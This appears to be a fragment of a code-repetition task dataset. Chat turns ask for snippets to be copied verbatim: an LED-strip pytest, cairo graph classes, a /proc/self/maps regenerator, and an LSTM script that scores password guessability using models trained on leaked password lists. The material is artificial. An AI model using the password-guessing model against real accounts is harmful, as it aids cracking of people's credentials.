# Set all lights to white\n light_string.set_all(255, 255, 255)\n\n # Display changes\n light_string.show()\n\n # Show lights for a few seconds\n time.sleep(3)\n\n # Clear all lights (set to black)\n light_string.clear()\n\n # Display changes\n light_string.show()\n\n # Show lights for a few seconds\n time.sleep(3)\n```\nReturn the exact text.",
"role": "user"
}
] |
[
{
"content": "Reconstruct the code exactly:\n<|memory_start|>```python\nimport pytest\nimport time\n\n\n# Not entirely happy with this check\n# TODO Change when I understand pytest better\ndef skip_if_unplugged():\n import usb.core\n dev = usb.core.find(idVendor=0x0403, idProduct=0x6014)\n if dev is None:\n pytest.skip(\"FT232H not plugged in\")\n\n\ndef test_lights(num_lights, light_type, brightness, backend):\n # Skip if unplugged\n if backend == \"pyftdi\":\n skip_if_unplugged()\n\n # Create string of lights\n light_string = light_type(num_lights, backend=backend,\n brightness=brightness)\n\n # Set light colours\n colours = [(255, 0, 0),\n (0, 255, 0),\n (0, 0, 255),\n (255, 255, 0),\n (255, 0, 255),\n (0, 255, 255)]\n\n for i in range(num_lights):\n light_string[i] = colours[i % len(colours)]\n\n # Update light\n light_string.show()\n\n # Show lights for a few seconds\n time.sleep(3)\n\n\ndef test_lights_2(num_lights, light_type, brightness, backend):\n # Skip if unplugged\n if backend == \"pyftdi\":\n skip_if_unplugged()\n\n # Create string of lights\n light_string = light_type(num_lights, brightness=brightness)\n light_string.backend = backend\n\n # Set all lights to white\n light_string.set_all(255, 255, 255)\n\n # Display changes\n light_string.show()\n\n # Show lights for a few seconds\n time.sleep(3)\n\n # Clear all lights (set to black)\n light_string.clear()\n\n # Display changes\n light_string.show()\n\n # Show lights for a few seconds\n time.sleep(3)\n```<|memory_end|>\nReturn the exact text.",
"role": "user"
}
] |
```python
import pytest
import time
# Not entirely happy with this check
# TODO Change when I understand pytest better
def skip_if_unplugged():
import usb.core
dev = usb.core.find(idVendor=0x0403, idProduct=0x6014)
if dev is None:
pytest.skip("FT232H not plugged in")
def test_lights(num_lights, light_type, brightness, backend):
# Skip if unplugged
if backend == "pyftdi":
skip_if_unplugged()
# Create string of lights
light_string = light_type(num_lights, backend=backend,
brightness=brightness)
# Set light colours
colours = [(255, 0, 0),
(0, 255, 0),
(0, 0, 255),
(255, 255, 0),
(255, 0, 255),
(0, 255, 255)]
for i in range(num_lights):
light_string[i] = colours[i % len(colours)]
# Update light
light_string.show()
# Show lights for a few seconds
time.sleep(3)
def test_lights_2(num_lights, light_type, brightness, backend):
# Skip if unplugged
if backend == "pyftdi":
skip_if_unplugged()
# Create string of lights
light_string = light_type(num_lights, brightness=brightness)
light_string.backend = backend
# Set all lights to white
light_string.set_all(255, 255, 255)
# Display changes
light_string.show()
# Show lights for a few seconds
time.sleep(3)
# Clear all lights (set to black)
light_string.clear()
# Display changes
light_string.show()
# Show lights for a few seconds
time.sleep(3)
```
|
[
{
"content": "```python\n\"\"\"\nBase graph objects\n\"\"\"\n\nfrom evh.base import EvHandler,EvStack\nfrom math import *\n\nclass Drawable(object):\n \"\"\"\n Base class for drawable objects.\n \"\"\"\n def __init__(self,x,y,scale=1.0):\n self.x=x\n self.y=y\n self.scale=scale\n\n def Draw(self,ctx):\n ctx.save()\n ctx.scale(self.scale,self.scale)\n ctx.translate(self.x,self.y)\n self.Draw_(ctx)\n ctx.restore()\n\n def ToLocal(self,x,y):\n return ((x/self.scale)-self.x,(y/self.scale)-self.y)\n\n def FromLocal(self,x,y):\n return (self.x+x*self.scale,self.y+y*self.scale)\n\n def Draw_(self,ctx):\n \"\"\"\n Main method to do the cairo drawing of the object.\n This is the main function drawable objects have to override.\n @param ctx: cairo context\n \"\"\"\n pass\n\nclass Collider(object):\n \"\"\"\n Base class for colliders.\n \"\"\"\n def Test(self,x,y):\n raise repr(self),\"Not implemented!\"\n\nclass CircleCollider(Collider):\n \"\"\"\n A circle collider.\n \"\"\"\n def __init__(self,r):\n self.r=r\n def Test(self,x,y):\n return sqrt((x-self.x)**2+(y-self.y)**2)<=self.r\n \nclass RectCollider(Collider):\n \"\"\"\n A rect collider.\n \"\"\"\n def __init__(self,w,h):\n self.w=w\n self.h=h\n\n def Test(self,x,y):\n return x>=self.x and x<=self.x+self.w and y>=self.y and y<=self.y+self.h\n\nclass GraphObject(Drawable,Collider):\n \"\"\"\n Base class for graph objects.\n \"\"\"\n def __init__(self,parent,x,y,scale=1.0):\n if parent:\n self.parent=parent\n Drawable.__init__(self,x,y,scale)\n self.evstack=EvStack()\n def GetPointer(self):\n return self.ToLocal(*self.parent.GetPointer())\n def Redraw(self):\n self.parent.Redraw()\n def ToParent(self,obj,x,y):\n if obj==self:\n return (x,y)\n else:\n return self.parent.ToParent(obj,*self.FromLocal(x,y))\n def Root(self):\n return self.parent.Root()\n\nclass Graph(GraphObject):\n \"\"\"\n A graph capable of containing connected objects.\n \"\"\"\n def __init__(self,parent,x,y,scale=1.0):\n GraphObject.__init__(self,parent,x,y,scale)\n self.evstack.append(PropagateEvH(self))\n self.Clear()\n\n def Clear(self):\n self.objects=[[],[],[],[]]\n\n def Draw_(self,ctx):\n for prio in self.objects:\n for obj in prio:\n obj.Draw(ctx)\n\n def Propagate(self,x,y,event,*args):\n o=self.ObjectAt(x,y)\n return o and getattr(o.evstack,event,False) and getattr(o.evstack,event)(*args)\n\n def ObjectAt(self,x,y):\n for prio in reversed(self.objects):\n for o in reversed(prio):\n if o.Test(x,y):\n return o\n\n\nclass MainGraph(Graph):\n \"\"\"\n Base class for main graphs.\n \"\"\"\n def __init__(self,*args):\n Graph.__init__(self,*args)\n self.objects[1]=[]\n\n def Clear(self):\n Graph.Clear(self)\n self.objects[1]=[]\n\n def Zoom(self,x,y,factor):\n pre_x,pre_y = self.ToLocal(x,y)\n self.scale *=factor\n post_x,post_y = self.ToLocal(x,y)\n self.x,self.y = (self.x+post_x-pre_x,self.y+post_y-pre_y)\n self.Redraw()\n\n def AddNode(self,obj):\n self.objects[0].append(obj)\n self.Redraw()\n\n def ToGlobal(self,x,y):\n return (x,y)\n\n def GetRawPointer(self):\n raise \"Not implemented\"\n\n def GetPointer(self):\n return self.ToLocal(*self.RawPointer)\n\n def Root(self):\n return self\n\n def Test(self,x,y):\n return True\n\n def CenteredBB(self,x,y,size):\n # not really needed, but useful in general..\n obj_size = size\n bb = [x-(obj_size/2),y-(obj_size/2),obj_size,obj_size]\n return bb\n\n RawPointer = property(GetRawPointer)\n Pointer = property(GetPointer)\n\nclass PropagateEvH(EvHandler):\n \"\"\"\n Event handler for propagating to children.\n \"\"\"\n def __init__(self,graph):\n \"\"\"\n PropagateEvH Constructor.\n @param graph: graph to which this event handler is attached.\n \"\"\"\n self.graph=graph\n\n def __getattr__(self,name):\n x,y=self.graph.GetPointer()\n return lambda *args: self.graph.Propagate(x,y,name,*args)\n```\nWrite out the full code verbatim.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n\"\"\"\nBase graph objects\n\"\"\"\n\nfrom evh.base import EvHandler,EvStack\nfrom math import *\n\nclass Drawable(object):\n \"\"\"\n Base class for drawable objects.\n \"\"\"\n def __init__(self,x,y,scale=1.0):\n self.x=x\n self.y=y\n self.scale=scale\n\n def Draw(self,ctx):\n ctx.save()\n ctx.scale(self.scale,self.scale)\n ctx.translate(self.x,self.y)\n self.Draw_(ctx)\n ctx.restore()\n\n def ToLocal(self,x,y):\n return ((x/self.scale)-self.x,(y/self.scale)-self.y)\n\n def FromLocal(self,x,y):\n return (self.x+x*self.scale,self.y+y*self.scale)\n\n def Draw_(self,ctx):\n \"\"\"\n Main method to do the cairo drawing of the object.\n This is the main function drawable objects have to override.\n @param ctx: cairo context\n \"\"\"\n pass\n\nclass Collider(object):\n \"\"\"\n Base class for colliders.\n \"\"\"\n def Test(self,x,y):\n raise repr(self),\"Not implemented!\"\n\nclass CircleCollider(Collider):\n \"\"\"\n A circle collider.\n \"\"\"\n def __init__(self,r):\n self.r=r\n def Test(self,x,y):\n return sqrt((x-self.x)**2+(y-self.y)**2)<=self.r\n \nclass RectCollider(Collider):\n \"\"\"\n A rect collider.\n \"\"\"\n def __init__(self,w,h):\n self.w=w\n self.h=h\n\n def Test(self,x,y):\n return x>=self.x and x<=self.x+self.w and y>=self.y and y<=self.y+self.h\n\nclass GraphObject(Drawable,Collider):\n \"\"\"\n Base class for graph objects.\n \"\"\"\n def __init__(self,parent,x,y,scale=1.0):\n if parent:\n self.parent=parent\n Drawable.__init__(self,x,y,scale)\n self.evstack=EvStack()\n def GetPointer(self):\n return self.ToLocal(*self.parent.GetPointer())\n def Redraw(self):\n self.parent.Redraw()\n def ToParent(self,obj,x,y):\n if obj==self:\n return (x,y)\n else:\n return self.parent.ToParent(obj,*self.FromLocal(x,y))\n def Root(self):\n return self.parent.Root()\n\nclass Graph(GraphObject):\n \"\"\"\n A graph capable of containing connected objects.\n \"\"\"\n def __init__(self,parent,x,y,scale=1.0):\n GraphObject.__init__(self,parent,x,y,scale)\n self.evstack.append(PropagateEvH(self))\n self.Clear()\n\n def Clear(self):\n self.objects=[[],[],[],[]]\n\n def Draw_(self,ctx):\n for prio in self.objects:\n for obj in prio:\n obj.Draw(ctx)\n\n def Propagate(self,x,y,event,*args):\n o=self.ObjectAt(x,y)\n return o and getattr(o.evstack,event,False) and getattr(o.evstack,event)(*args)\n\n def ObjectAt(self,x,y):\n for prio in reversed(self.objects):\n for o in reversed(prio):\n if o.Test(x,y):\n return o\n\n\nclass MainGraph(Graph):\n \"\"\"\n Base class for main graphs.\n \"\"\"\n def __init__(self,*args):\n Graph.__init__(self,*args)\n self.objects[1]=[]\n\n def Clear(self):\n Graph.Clear(self)\n self.objects[1]=[]\n\n def Zoom(self,x,y,factor):\n pre_x,pre_y = self.ToLocal(x,y)\n self.scale *=factor\n post_x,post_y = self.ToLocal(x,y)\n self.x,self.y = (self.x+post_x-pre_x,self.y+post_y-pre_y)\n self.Redraw()\n\n def AddNode(self,obj):\n self.objects[0].append(obj)\n self.Redraw()\n\n def ToGlobal(self,x,y):\n return (x,y)\n\n def GetRawPointer(self):\n raise \"Not implemented\"\n\n def GetPointer(self):\n return self.ToLocal(*self.RawPointer)\n\n def Root(self):\n return self\n\n def Test(self,x,y):\n return True\n\n def CenteredBB(self,x,y,size):\n # not really needed, but useful in general..\n obj_size = size\n bb = [x-(obj_size/2),y-(obj_size/2),obj_size,obj_size]\n return bb\n\n RawPointer = property(GetRawPointer)\n Pointer = property(GetPointer)\n\nclass PropagateEvH(EvHandler):\n \"\"\"\n Event handler for propagating to children.\n \"\"\"\n def __init__(self,graph):\n \"\"\"\n PropagateEvH Constructor.\n @param graph: graph to which this event handler is attached.\n \"\"\"\n self.graph=graph\n\n def __getattr__(self,name):\n x,y=self.graph.GetPointer()\n return lambda *args: self.graph.Propagate(x,y,name,*args)\n```<|memory_end|>\nWrite out the full code verbatim.",
"role": "user"
}
] |
```python
"""
Base graph objects
"""
from evh.base import EvHandler,EvStack
from math import *
class Drawable(object):
"""
Base class for drawable objects.
"""
def __init__(self,x,y,scale=1.0):
self.x=x
self.y=y
self.scale=scale
def Draw(self,ctx):
ctx.save()
ctx.scale(self.scale,self.scale)
ctx.translate(self.x,self.y)
self.Draw_(ctx)
ctx.restore()
def ToLocal(self,x,y):
return ((x/self.scale)-self.x,(y/self.scale)-self.y)
def FromLocal(self,x,y):
return (self.x+x*self.scale,self.y+y*self.scale)
def Draw_(self,ctx):
"""
Main method to do the cairo drawing of the object.
This is the main function drawable objects have to override.
@param ctx: cairo context
"""
pass
class Collider(object):
"""
Base class for colliders.
"""
def Test(self,x,y):
raise repr(self),"Not implemented!"
class CircleCollider(Collider):
"""
A circle collider.
"""
def __init__(self,r):
self.r=r
def Test(self,x,y):
return sqrt((x-self.x)**2+(y-self.y)**2)<=self.r
class RectCollider(Collider):
"""
A rect collider.
"""
def __init__(self,w,h):
self.w=w
self.h=h
def Test(self,x,y):
return x>=self.x and x<=self.x+self.w and y>=self.y and y<=self.y+self.h
class GraphObject(Drawable,Collider):
"""
Base class for graph objects.
"""
def __init__(self,parent,x,y,scale=1.0):
if parent:
self.parent=parent
Drawable.__init__(self,x,y,scale)
self.evstack=EvStack()
def GetPointer(self):
return self.ToLocal(*self.parent.GetPointer())
def Redraw(self):
self.parent.Redraw()
def ToParent(self,obj,x,y):
if obj==self:
return (x,y)
else:
return self.parent.ToParent(obj,*self.FromLocal(x,y))
def Root(self):
return self.parent.Root()
class Graph(GraphObject):
"""
A graph capable of containing connected objects.
"""
def __init__(self,parent,x,y,scale=1.0):
GraphObject.__init__(self,parent,x,y,scale)
self.evstack.append(PropagateEvH(self))
self.Clear()
def Clear(self):
self.objects=[[],[],[],[]]
def Draw_(self,ctx):
for prio in self.objects:
for obj in prio:
obj.Draw(ctx)
def Propagate(self,x,y,event,*args):
o=self.ObjectAt(x,y)
return o and getattr(o.evstack,event,False) and getattr(o.evstack,event)(*args)
def ObjectAt(self,x,y):
for prio in reversed(self.objects):
for o in reversed(prio):
if o.Test(x,y):
return o
class MainGraph(Graph):
"""
Base class for main graphs.
"""
def __init__(self,*args):
Graph.__init__(self,*args)
self.objects[1]=[]
def Clear(self):
Graph.Clear(self)
self.objects[1]=[]
def Zoom(self,x,y,factor):
pre_x,pre_y = self.ToLocal(x,y)
self.scale *=factor
post_x,post_y = self.ToLocal(x,y)
self.x,self.y = (self.x+post_x-pre_x,self.y+post_y-pre_y)
self.Redraw()
def AddNode(self,obj):
self.objects[0].append(obj)
self.Redraw()
def ToGlobal(self,x,y):
return (x,y)
def GetRawPointer(self):
raise "Not implemented"
def GetPointer(self):
return self.ToLocal(*self.RawPointer)
def Root(self):
return self
def Test(self,x,y):
return True
def CenteredBB(self,x,y,size):
# not really needed, but useful in general..
obj_size = size
bb = [x-(obj_size/2),y-(obj_size/2),obj_size,obj_size]
return bb
RawPointer = property(GetRawPointer)
Pointer = property(GetPointer)
class PropagateEvH(EvHandler):
"""
Event handler for propagating to children.
"""
def __init__(self,graph):
"""
PropagateEvH Constructor.
@param graph: graph to which this event handler is attached.
"""
self.graph=graph
def __getattr__(self,name):
x,y=self.graph.GetPointer()
return lambda *args: self.graph.Propagate(x,y,name,*args)
```
|
[
{
"content": "Repeat the code exactly as the original, including blank lines:\n```python\n#!/usr/bin/env python\n\n\"\"\"Handle records from /proc/self/maps data files\"\"\"\n\nimport regentest as RG\nimport ProcHandlers as PH\n\nPFC = PH.ProcFieldConstants\n\n# ---\n\ndef re_self_maps(inprecs):\n\n \"\"\"Iterate through parsed records and re-generate data file\"\"\"\n\n __leadtemp = \"{st:08x}-{en:08x} {fl:4s} {offset:08x} \\\n{major:02x}:{minor:02x} {inode:d} \"\n\n __ptr_size = 8\n __preflen = (__ptr_size * 6) + 25\n __preftemp = \"{{pref:<{plen:d}s}}\".format(plen=__preflen)\n\n __template = \"{pref:s}{path:s}\"\n\n for __hilit in inprecs:\n __ff = inprecs.field\n\n#...+....1....+....2....+....3....+....4....+....5....+....6....+....7....+....8\n __lead = __leadtemp.format(st=__ff[PFC.F_START], en=__ff[PFC.F_END],\n fl=__ff[PFC.F_FLAGS], offset=__ff[PFC.F_PAGE_OFFSET],\n major=__ff[PFC.F_MAJOR_DEV], minor=__ff[PFC.F_MINOR_DEV],\n inode=__ff[PFC.F_INODE]\n )\n\n __path = __ff[PFC.F_PATH]\n if __path == \"\":\n print __lead\n else:\n __pref = __preftemp.format(pref=__lead)\n print __template.format(pref=__pref, path=__ff[PFC.F_PATH])\n\nRG.RECREATOR[PH.GET_HANDLER(\"/proc/self/maps\")] = re_self_maps\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the code exactly as the original, including blank lines:\n<|memory_start|>```python\n#!/usr/bin/env python\n\n\"\"\"Handle records from /proc/self/maps data files\"\"\"\n\nimport regentest as RG\nimport ProcHandlers as PH\n\nPFC = PH.ProcFieldConstants\n\n# ---\n\ndef re_self_maps(inprecs):\n\n \"\"\"Iterate through parsed records and re-generate data file\"\"\"\n\n __leadtemp = \"{st:08x}-{en:08x} {fl:4s} {offset:08x} \\\n{major:02x}:{minor:02x} {inode:d} \"\n\n __ptr_size = 8\n __preflen = (__ptr_size * 6) + 25\n __preftemp = \"{{pref:<{plen:d}s}}\".format(plen=__preflen)\n\n __template = \"{pref:s}{path:s}\"\n\n for __hilit in inprecs:\n __ff = inprecs.field\n\n#...+....1....+....2....+....3....+....4....+....5....+....6....+....7....+....8\n __lead = __leadtemp.format(st=__ff[PFC.F_START], en=__ff[PFC.F_END],\n fl=__ff[PFC.F_FLAGS], offset=__ff[PFC.F_PAGE_OFFSET],\n major=__ff[PFC.F_MAJOR_DEV], minor=__ff[PFC.F_MINOR_DEV],\n inode=__ff[PFC.F_INODE]\n )\n\n __path = __ff[PFC.F_PATH]\n if __path == \"\":\n print __lead\n else:\n __pref = __preftemp.format(pref=__lead)\n print __template.format(pref=__pref, path=__ff[PFC.F_PATH])\n\nRG.RECREATOR[PH.GET_HANDLER(\"/proc/self/maps\")] = re_self_maps\n```<|memory_end|>",
"role": "user"
}
] |
```python
#!/usr/bin/env python
"""Handle records from /proc/self/maps data files"""
import regentest as RG
import ProcHandlers as PH
PFC = PH.ProcFieldConstants
# ---
def re_self_maps(inprecs):
"""Iterate through parsed records and re-generate data file"""
__leadtemp = "{st:08x}-{en:08x} {fl:4s} {offset:08x} \
{major:02x}:{minor:02x} {inode:d} "
__ptr_size = 8
__preflen = (__ptr_size * 6) + 25
__preftemp = "{{pref:<{plen:d}s}}".format(plen=__preflen)
__template = "{pref:s}{path:s}"
for __hilit in inprecs:
__ff = inprecs.field
#...+....1....+....2....+....3....+....4....+....5....+....6....+....7....+....8
__lead = __leadtemp.format(st=__ff[PFC.F_START], en=__ff[PFC.F_END],
fl=__ff[PFC.F_FLAGS], offset=__ff[PFC.F_PAGE_OFFSET],
major=__ff[PFC.F_MAJOR_DEV], minor=__ff[PFC.F_MINOR_DEV],
inode=__ff[PFC.F_INODE]
)
__path = __ff[PFC.F_PATH]
if __path == "":
print __lead
else:
__pref = __preftemp.format(pref=__lead)
print __template.format(pref=__pref, path=__ff[PFC.F_PATH])
RG.RECREATOR[PH.GET_HANDLER("/proc/self/maps")] = re_self_maps
```
|
[
{
"content": "Here is a code file:\n```python\n'''Example script to generate text from Nietzsche's writings.\n\nAt least 20 epochs are required before the generated text\nstarts sounding coherent.\n\nIt is recommended to run this script on GPU, as recurrent\nnetworks are quite computationally intensive.\n\nIf you try this script on new data, make sure your corpus\nhas at least ~100k characters. ~1M is better.\n'''\n\nfrom __future__ import print_function\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.layers import LSTM\nfrom keras.optimizers import RMSprop\nfrom keras.utils.data_utils import get_file\nimport numpy as np\nimport random\nimport sys\nimport json\n\njohn_char_indices = {'9': 16, 'Q': 35, '6': 13, '~': 72, '7': 14, 'E': 23, 'h': 52, 'b': 46, '2': 9, '1': 8, ';': 17, 'y': 69, 'I': 27, '$': 2, 'o': 59, 'e': 49, 'F': 24, 'O': 33, 'B': 20, 'q': 61, 'w': 67, 'v': 66, 'U': 39, '5': 12, 'A': 19, 'S': 37, 'x': 68, 'p': 60, '`': 71, '8': 15, '#': 1, 'J': 28, 'm': 57, 'i': 53, 'V': 40, '*': 5, 'n': 58, 'j': 54, 'R': 36, 'K': 29, 'N': 32, 'f': 50, 's': 63, 'c': 47, '0': 7, 'z': 70, 't': 64, 'l': 56, 'C': 21, '-': 6, 'k': 55, 'Y': 42, 'M': 31, 'g': 51, 'd': 48, 'D': 22, '4': 11, 'P': 34, 'u': 65, 'H': 26, 'r': 62, 'W': 41, 'G': 25, '^': 44, '&': 4, 'L': 30, 'T': 38, 'Z': 43, '%': 3, '!': 0, '@': 18, 'a': 45, '3': 10}\nmyspace_char_indices = {'9': 25, ')': 9, \"'\": 7, 'G': 37, '7': 23, 'E': 35, 'F': 36, '+': 11, '2': 18, ';': 26, 'I': 39, '$': 4, 'o': 77, 'D': 34, 'x': 86, 'B': 32, 'w': 85, 'U': 51, '5': 21, 'J': 40, 'a': 63, '\\\\': 58, '`': 62, '8': 24, '~': 91, 'm': 75, '/': 15, 'Q': 47, '*': 10, 'j': 72, 'R': 48, 'K': 41, ' ': 0, 'z': 88, '(': 8, 'C': 33, '-': 13, 'k': 73, 'M': 43, 'u': 83, 'H': 38, 'r': 80, '^': 60, '&': 6, '\"': 2, 'L': 42, 'T': 50, 'l': 74, 'X': 54, '@': 30, 'c': 65, '3': 19, 'N': 44, '{': 89, '6': 22, 'y': 87, 'h': 70, ']': 59, 'b': 64, '1': 17, '?': 29, 'e': 67, 'Z': 56, '[': 57, '%': 5, 'q': 79, 'v': 84, 'd': 66, '}': 90, 'A': 31, 'S': 49, ',': 12, 'O': 45, '#': 3, 'i': 71, '.': 14, 'V': 52, 'p': 78, 'n': 76, '4': 20, '>': 28, 'f': 68, 't': 82, 'Y': 55, 'g': 69, '!': 1, 'P': 46, 'W': 53, 's': 81, '_': 61, '0': 16, '=': 27}\n\njohn_data = ['john', 25, 73, john_char_indices]\nmyspace_data = ['myspace', 28, 94, myspace_char_indices]\n\ntest_sets = []\n\nfor i in ['500','1000']:\n for j in ['FourType', 'ThreeType', 'FirstThreeChar']:\n name = j + i\n test_sets.append(name)\n\n#\ndata_sets = [myspace_data, john_data]\n\n#test_sets = test_sets + ['myspace', 'phpbb', 'john', 'cain']\n#test_sets = test_sets + ['bookWordsFirstLetter','8type3','16type3']\n \n \n \n#MAX_SIZE = 16\nsentence_size = 12\norig_path = './passwordGen/passwordFiles/'\n\n\n\n\nfor i in range(len(data_sets)):\n name = data_sets[i][0]\n maxlen = data_sets[i][1]\n chars = data_sets[i][2]\n char_indices = data_sets[i][3]\n\n model = Sequential()\n model.add(LSTM(128, input_shape=(maxlen, chars)))\n model.add(Dense(chars))\n model.add(Activation('softmax'))\n optimizer = RMSprop(lr=0.01)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer)\n model.load_weights(\"model_\" + str(name) + \".h5\")\n model.compile(loss='categorical_crossentropy', optimizer=optimizer)\n print(model.summary())\n \n for testname in test_sets:\n path = orig_path + testname + '.txt'\n \n \n \n \n text = open(path,'r',encoding='ascii',errors='ignore').read()#.lower()\n data = np.array(text.split('\\n'))\n data = data[:-1]\n #data = data[:14000000]\n data = np.array([line for line in data if len(line) <= 32])\n \n if len(data) > 500:\n data = np.random.choice(data, 500, replace=False)\n \n fullInfo = []\n sentenceBase = np.array([char_indices['~']]*12)\n for passCount, password_orig in enumerate(data):\n if passCount % 100 == 0:\n print(passCount, '/', len(data))\n # Calc prob\n sentence = sentenceBase\n\n passlen = len(password_orig)\n password = [char_indices[c] for c in password_orig if c in char_indices]\n if passlen != len(password):\n continue\n \n password.append(char_indices['`'])\n passlen = passlen+1\n passProb = 1\n for i in range(passlen-1):\n #print(i)\n x = np.zeros((1, maxlen, chars))\n \n np.delete(sentence,0)\n np.append(sentence, password[i])\n #print(sentence[0])\n for t, char in enumerate(sentence):\n x[0, t, char] = 1.\n \n #sentence = sentence[1:] + [password[i]]\n preds = model.predict(x, verbose=0)[0]\n\n if i < passlen-2:\n passProb = passProb * preds[password[i+1]]\n #z = model.predict(curArray)\n passGuessCount = 1/passProb\n #print(password[:-1], '\\t', passGuessCount, '\\n')\n fullInfo.append([passGuessCount, password_orig])\n \n \n fullInfo.sort()\n #fullInfo.reverse()\n fullString = [d[1] + '\\t' + str(d[0]) for d in fullInfo]\n fullString = '\\n'.join(fullString)\n saveFileName = name + '_on_' + testname + '.txt'\n saveFile = open(saveFileName, 'w')\n saveFile.write(fullString)\n saveFile.close()\n```\nReturn the same code.",
"role": "user"
}
] |
[
{
"content": "Here is a code file:\n<|memory_start|>```python\n'''Example script to generate text from Nietzsche's writings.\n\nAt least 20 epochs are required before the generated text\nstarts sounding coherent.\n\nIt is recommended to run this script on GPU, as recurrent\nnetworks are quite computationally intensive.\n\nIf you try this script on new data, make sure your corpus\nhas at least ~100k characters. ~1M is better.\n'''\n\nfrom __future__ import print_function\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.layers import LSTM\nfrom keras.optimizers import RMSprop\nfrom keras.utils.data_utils import get_file\nimport numpy as np\nimport random\nimport sys\nimport json\n\njohn_char_indices = {'9': 16, 'Q': 35, '6': 13, '~': 72, '7': 14, 'E': 23, 'h': 52, 'b': 46, '2': 9, '1': 8, ';': 17, 'y': 69, 'I': 27, '$': 2, 'o': 59, 'e': 49, 'F': 24, 'O': 33, 'B': 20, 'q': 61, 'w': 67, 'v': 66, 'U': 39, '5': 12, 'A': 19, 'S': 37, 'x': 68, 'p': 60, '`': 71, '8': 15, '#': 1, 'J': 28, 'm': 57, 'i': 53, 'V': 40, '*': 5, 'n': 58, 'j': 54, 'R': 36, 'K': 29, 'N': 32, 'f': 50, 's': 63, 'c': 47, '0': 7, 'z': 70, 't': 64, 'l': 56, 'C': 21, '-': 6, 'k': 55, 'Y': 42, 'M': 31, 'g': 51, 'd': 48, 'D': 22, '4': 11, 'P': 34, 'u': 65, 'H': 26, 'r': 62, 'W': 41, 'G': 25, '^': 44, '&': 4, 'L': 30, 'T': 38, 'Z': 43, '%': 3, '!': 0, '@': 18, 'a': 45, '3': 10}\nmyspace_char_indices = {'9': 25, ')': 9, \"'\": 7, 'G': 37, '7': 23, 'E': 35, 'F': 36, '+': 11, '2': 18, ';': 26, 'I': 39, '$': 4, 'o': 77, 'D': 34, 'x': 86, 'B': 32, 'w': 85, 'U': 51, '5': 21, 'J': 40, 'a': 63, '\\\\': 58, '`': 62, '8': 24, '~': 91, 'm': 75, '/': 15, 'Q': 47, '*': 10, 'j': 72, 'R': 48, 'K': 41, ' ': 0, 'z': 88, '(': 8, 'C': 33, '-': 13, 'k': 73, 'M': 43, 'u': 83, 'H': 38, 'r': 80, '^': 60, '&': 6, '\"': 2, 'L': 42, 'T': 50, 'l': 74, 'X': 54, '@': 30, 'c': 65, '3': 19, 'N': 44, '{': 89, '6': 22, 'y': 87, 'h': 70, ']': 59, 'b': 64, '1': 17, '?': 29, 'e': 67, 'Z': 56, '[': 57, '%': 5, 'q': 79, 'v': 84, 'd': 66, '}': 90, 'A': 31, 'S': 49, ',': 12, 'O': 45, '#': 3, 'i': 71, '.': 14, 'V': 52, 'p': 78, 'n': 76, '4': 20, '>': 28, 'f': 68, 't': 82, 'Y': 55, 'g': 69, '!': 1, 'P': 46, 'W': 53, 's': 81, '_': 61, '0': 16, '=': 27}\n\njohn_data = ['john', 25, 73, john_char_indices]\nmyspace_data = ['myspace', 28, 94, myspace_char_indices]\n\ntest_sets = []\n\nfor i in ['500','1000']:\n for j in ['FourType', 'ThreeType', 'FirstThreeChar']:\n name = j + i\n test_sets.append(name)\n\n#\ndata_sets = [myspace_data, john_data]\n\n#test_sets = test_sets + ['myspace', 'phpbb', 'john', 'cain']\n#test_sets = test_sets + ['bookWordsFirstLetter','8type3','16type3']\n \n \n \n#MAX_SIZE = 16\nsentence_size = 12\norig_path = './passwordGen/passwordFiles/'\n\n\n\n\nfor i in range(len(data_sets)):\n name = data_sets[i][0]\n maxlen = data_sets[i][1]\n chars = data_sets[i][2]\n char_indices = data_sets[i][3]\n\n model = Sequential()\n model.add(LSTM(128, input_shape=(maxlen, chars)))\n model.add(Dense(chars))\n model.add(Activation('softmax'))\n optimizer = RMSprop(lr=0.01)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer)\n model.load_weights(\"model_\" + str(name) + \".h5\")\n model.compile(loss='categorical_crossentropy', optimizer=optimizer)\n print(model.summary())\n \n for testname in test_sets:\n path = orig_path + testname + '.txt'\n \n \n \n \n text = open(path,'r',encoding='ascii',errors='ignore').read()#.lower()\n data = np.array(text.split('\\n'))\n data = data[:-1]\n #data = data[:14000000]\n data = np.array([line for line in data if len(line) <= 32])\n \n if len(data) > 500:\n data = np.random.choice(data, 500, replace=False)\n \n fullInfo = []\n sentenceBase = np.array([char_indices['~']]*12)\n for passCount, password_orig in enumerate(data):\n if passCount % 100 == 0:\n print(passCount, '/', len(data))\n # Calc prob\n sentence = sentenceBase\n\n passlen = len(password_orig)\n password = [char_indices[c] for c in password_orig if c in char_indices]\n if passlen != len(password):\n continue\n \n password.append(char_indices['`'])\n passlen = passlen+1\n passProb = 1\n for i in range(passlen-1):\n #print(i)\n x = np.zeros((1, maxlen, chars))\n \n np.delete(sentence,0)\n np.append(sentence, password[i])\n #print(sentence[0])\n for t, char in enumerate(sentence):\n x[0, t, char] = 1.\n \n #sentence = sentence[1:] + [password[i]]\n preds = model.predict(x, verbose=0)[0]\n\n if i < passlen-2:\n passProb = passProb * preds[password[i+1]]\n #z = model.predict(curArray)\n passGuessCount = 1/passProb\n #print(password[:-1], '\\t', passGuessCount, '\\n')\n fullInfo.append([passGuessCount, password_orig])\n \n \n fullInfo.sort()\n #fullInfo.reverse()\n fullString = [d[1] + '\\t' + str(d[0]) for d in fullInfo]\n fullString = '\\n'.join(fullString)\n saveFileName = name + '_on_' + testname + '.txt'\n saveFile = open(saveFileName, 'w')\n saveFile.write(fullString)\n saveFile.close()\n```<|memory_end|>\nReturn the same code.",
"role": "user"
}
] |
```python
'''Example script to generate text from Nietzsche's writings.
At least 20 epochs are required before the generated text
starts sounding coherent.
It is recommended to run this script on GPU, as recurrent
networks are quite computationally intensive.
If you try this script on new data, make sure your corpus
has at least ~100k characters. ~1M is better.
'''
from __future__ import print_function
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout
from keras.layers import LSTM
from keras.optimizers import RMSprop
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
import json
